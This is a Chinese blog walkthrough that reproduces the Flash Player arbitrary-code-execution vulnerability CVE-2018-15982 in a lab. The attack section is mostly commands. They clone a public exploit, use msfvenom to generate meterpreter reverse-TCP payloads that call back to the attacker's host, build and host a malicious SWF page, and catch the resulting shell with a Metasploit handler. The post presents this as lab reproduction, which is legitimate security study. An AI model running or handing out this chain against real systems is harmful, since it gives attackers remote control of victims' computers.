CVE-2018-15982任意代码执行漏洞复现

0x01 漏洞概述

2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。


0x02 影响版本

  • AdobeFlash Player <= 31.0.0.153
  • AdobeFlash Player Installer<= 31.0.0.108
    (不包括AdobeFlash Player 32.0.0.101、AdobeFlash Player Installer 31.0.0.122)

0x03 漏洞复现

复现环境

攻击机:Linux kali (192.168.159.136)
靶机:windows7 x64(192.168.159.133)
Flash版本: Adobe Flash Player ActiveX_29.0.0.155
链接: Adobe Flash Player ActiveX_29.0.0.155
提取码: c8sf
(注意:断网安装)

复现过程

kali:

git 漏洞POC
git clone https://github.com/Ridter/CVE-2018-15982_EXP

msfvenom生成两个payload程序(32位和64位)
msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.159.136 -f raw > 86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.159.136 -f raw > 64.bin

生成POC
将生成的两个.bin文件copy进下载的POC文件夹,
并cd进去,执行.py文件生成POC

cp *.bin CVE-2018-15982_EXP/
cd CVE-2018-15982_EXP/
python CVE_2018_15982.py -i 86.bin -I 64.bin

开启apache服务,并将生成的两个文件copy进html目录

systemctl start apache2.service
cp index.html /var/www/html
cp exploit.swf /var/www/html

设置msf监听

启动msf

msfconsole

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp_rc4
set lport 4444
set lhost 192.168.159.136
set RC4PASSWORD zale
exploit

靶机:

使用靶机访问192.168.159.136/index.html

成功反弹session

sessions -l
显示会话列表

sessions id
选择指定id会话


参考文章

CVE-2018-15982任意代码执行漏洞复现


   转载规则


《CVE-2018-15982任意代码执行漏洞复现》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
ecshop XSS 复现 ecshop XSS 复现
0x01 前言使用Chrome调试XSS漏洞,需要关闭XSS过滤器,才能成功弹窗 "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --args
2019-08-17
下一篇 
永恒之蓝漏洞(ms17-010)复现 永恒之蓝漏洞(ms17-010)复现
0x01 漏洞概述永恒之蓝漏洞(Eternalblue)是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。Eternalblue通过TCP端口445和139来利用SMBv1和NBT
2019-08-07
  目录